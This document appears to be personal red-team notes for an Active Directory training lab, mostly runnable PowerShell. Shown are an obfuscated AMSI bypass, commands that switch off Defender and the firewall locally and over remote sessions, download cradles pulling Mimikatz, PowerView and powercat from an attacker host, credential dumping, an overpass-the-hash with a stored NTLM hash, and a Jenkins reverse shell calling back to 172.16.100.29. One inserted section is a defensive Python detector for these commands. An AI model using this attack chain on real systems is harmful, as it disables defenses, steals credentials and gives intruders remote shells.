# New Server

## Bypass AMSI

```powershell
powershell -ep bypass

SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
. .\PowerView.ps1
Get-NetUser
```

## Disable Firewall and Defender

```powershell
#Check status of Microsoft Defender
Get-MpComputerStatus

#Disable Firewall (any one of these)
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"

#Disable Antivirus
Set-MpPreference -DisableRealtimeMonitoring $true

#Exclude file type
Set-MpPreference -ExclusionExtension EXTENSION

#Exclude locations
Set-MpPreference -ExclusionPath PATH\TO\FOLDER

#Same changes on a remote host over an existing PSRemoting session ($sess)
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess

#How to delete an active threat on Microsoft Defender
Remove-MpThreat
```

## Downloading scripts

```powershell
Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Invoke-WebRequest http://172.16.100.29/PowerUp.ps1 -OutFile C:\PowerUp.ps1
Invoke-WebRequest http://172.16.100.29/powercat.ps1 -OutFile C:\powercat.ps1
```

## Enumerate user

```powershell
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1

#Get a list of users in the current domain
Get-NetUser
Get-NetUser -Username student1

#Get list of all properties for users in the current domain
Get-UserProperty
Get-UserProperty -Properties pwdlastset
Get-UserProperty -Properties badpwdcount

#Find machines where the current user has local admin access
Find-LocalAdminAccess

#Search for a particular string in a user's attributes:
Find-UserField -SearchField Description -SearchTerm "pass"

#Get the group membership for a user:
Get-NetGroup -UserName "student1"

#Alternative tools: Find-WMILocalAdminAccess.ps1, FindPSRemotingLocalAdminAccess.ps1

#Find local admins on all machines of the domain
#(needs administrator privs on non-dc machines).
Invoke-EnumerateLocalAdmin -Verbose

#Find computers where a domain admin (or specified user/group) has sessions:
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"

#To confirm admin access
Invoke-UserHunter -CheckAccess

#Find computers where a domain admin is logged in (stealth mode)
Invoke-UserHunter -Stealth
```

## Access to other servers for remote commands via PowerShell

```powershell
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1

#Get a list of computers in the current domain
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData

#Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess
Find-LocalAdminAccess -Verbose
```

Process running

## Get Hashes and move Lateral

```powershell
Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1
Import-Module C:\Invoke-Mimikatz.ps1

#Find machines where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Alternative tools: Find-WMILocalAdminAccess.ps1, FindPSRemotingLocalAdminAccess.ps1

#Step One: Find where domain admins are logged in:
Invoke-UserHunter

#Step Two: Check if we have admin access:
Invoke-UserHunter -CheckAccess

#Step Three: Check if we can execute commands:
Invoke-Command -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock{whoami;hostname;whoami /priv}

#Step Four: Create a session:
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
$sess

#Step Five: Load Invoke-Mimikatz in memory to get NTLM hashes (you need to be hosting the ps1 with HS1):
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1)
#or, if the Internet Explorer parsing engine is not available:
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1 -UseBasicParsing)

#Step Six: Disable AV and Firewall on the remote host
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess

#Step Eight: Run Invoke-Mimikatz from memory in the remote session:
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
#Then exit the remote connection -- IMPORTANT

#Step Nine: Overpass-the-hash
#Open an elevated PowerShell on the local computer
#Disable AV
Set-MpPreference -DisableRealtimeMonitoring $true
#Import Invoke-Mimikatz
Import-Module .\Invoke-Mimikatz.ps1
#Perform the overpass-the-hash attack:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'

#Step Ten: It opens a new PowerShell with the svcadmin token
#Therefore, you can connect to the server where the account has access
whoami
Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName dcorp-dc.dollarcorp.moneycorp.local

#Dump credentials locally or from a remote machine
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -ComputerName <target>

#Overpass-the-hash generates tokens from hashes:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'

#Crack hash
john --format=nt hash

#Download for Windows
#https://www.techspot.com/downloads/6970-john-the-ripper.html
```
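Added detection example, written for this page and not part of the original notes or of PowerView, Invoke-Mimikatz or powercat: a scanner that first undoes the three obfuscation tricks used in the AMSI bypass at the top of the page (backtick splitting, literal string concatenation, the `-f` format operator) and then flags script-block log entries that contain the Defender/firewall tampering, Mimikatz, overpass-the-hash and download-cradle commands shown above. The sample log entries are constructed, and the category names and indicator lists are my own assumptions, not a vendor rule set.

```python
import re

# Constructed sample script-block log entries (Event ID 4104 style), not from any real host:
# one benign command, then commands mirroring the Defender, firewall and AMSI sections above.
SAMPLE_BLOCKS = [
    r"Get-ChildItem C:\Windows\Temp | Measure-Object",
    r"Set-MpPreference -DisableRealtimeMonitoring $true",
    r"netsh advfirewall set allprofiles state off",
    r'''(GeT-VariaBle ("1Q2U"+"zX") -VaL)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" '''
    r'''-f'Util','A','Amsi','.Management.','utomation.','s','System' ))."g`etf`iElD"('''
    r'''( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))''',
]

CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")  # 'V'+'aR' -> 'VaR'
FORMAT_RE = re.compile(  # "{1}{0}" -f 'a','b' -> 'ba' (literal arguments only)
    r"""(['"])((?:\{\d+\})+)\1\s*-[fF]\s*((?:['"][^'"]*['"]\s*,\s*)*['"][^'"]*['"])""")

# Hypothetical category names and indicator substrings, matched on normalized lowercase text.
INDICATORS = {
    "amsi_tamper": ("amsiinitfailed", "amsiutils"),
    "defender_tamper": ("disablerealtimemonitoring", "disableioavprotection",
                        "exclusionpath", "exclusionextension", "remove-mpthreat"),
    "firewall_disable": ("advfirewall set allprofiles state off", "-enabled false"),
    "credential_theft": ("sekurlsa::", "invoke-mimikatz", "dumpcreds"),
    "download_cradle": ("downloadstring(", "iex (iwr", "iex(iwr"),
}

def normalize(block: str) -> str:
    """Undo the three obfuscation tricks used in the AMSI bypass, then lowercase."""
    text = block.replace("`", "")  # "A`ss`Embly" -> "Assembly" (heuristic: `n also becomes n)
    while True:                    # collapse chained literal concatenations until none remain
        text, count = CONCAT_RE.subn(lambda m: "'" + m.group(2) + m.group(4) + "'", text)
        if count == 0:
            break
    def expand(m):
        args = re.findall(r"""['"]([^'"]*)['"]""", m.group(3))
        order = [int(i) for i in re.findall(r"\{(\d+)\}", m.group(2))]
        if max(order) >= len(args):  # malformed format expression: leave it untouched
            return m.group(0)
        return "'" + "".join(args[i] for i in order) + "'"
    return FORMAT_RE.sub(expand, text).lower()

def classify(block: str) -> list:
    """Return the indicator categories present in one script block."""
    text = normalize(block)
    return [name for name, needles in INDICATORS.items() if any(n in text for n in needles)]

def scan(blocks) -> list:
    """Pair each suspicious block's index with its categories; benign blocks are omitted."""
    return [(i, hits) for i, b in enumerate(blocks) if (hits := classify(b))]
```

`scan(SAMPLE_BLOCKS)` flags entries 1 to 3 and leaves the benign first entry alone; the format-operator expansion is what turns the obfuscated fourth entry back into the plain `amsiInitFailed` and `System.Management.Automation.AmsiUtils` strings.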

## Jenkins reverse shell

```powershell
#Command run from Jenkins on the target: loads powercat in memory and connects back with a PowerShell shell
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.29/powercat.ps1')); powercat -c 172.16.100.29 -p 443 -ep;
#Listener on the attacker host (start it before triggering the command above)
powercat -l -v -p 443 -t 1064
```

## Privilege escalation

```powershell
Invoke-WebRequest http://172.16.100.29/PowerUp.ps1 -OutFile C:\PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-AllChecks
```

## Downloading scripts

```powershell
Invoke-WebRequest http://172.16.100.29/powercat.ps1 -OutFile C:\Downloads\powercat.ps1
```
